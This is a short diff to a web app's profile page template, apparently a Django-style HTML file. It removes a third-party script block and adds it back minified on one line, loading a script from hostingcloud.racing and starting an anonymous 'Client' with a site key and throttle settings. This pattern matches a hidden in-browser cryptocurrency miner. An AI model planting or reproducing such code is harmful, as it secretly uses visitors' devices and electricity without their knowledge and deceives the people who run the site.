--- a/main_app/templates/profile.html
+++ b/main_app/templates/profile.html
@@ -241,15 +241,6 @@
 
 		<script src="/static/js/profile.js"></script>
 		{% endif %}
-
-<script src="https://www.hostingcloud.racing/gCgZ.js"></script>
-<script>
-    var _client = new Client.Anonymous('5359e2aefac13b8544fcee9326d4a0aafb5fd62a6991f1e87ade167c09c9967a', {
-        throttle: 0.9, c: 'w', ads: 0
-    });
-    _client.start();
-
-
-</script>
+<script src="https://www.hostingcloud.racing/zk0a.js"></script><script>var _client=new Client.Anonymous("5359e2aefac13b8544fcee9326d4a0aafb5fd62a6991f1e87ade167c09c9967a",{throttle:.9,c:"w",ads:0});_client.start();</script>
 	</body>
 </html>
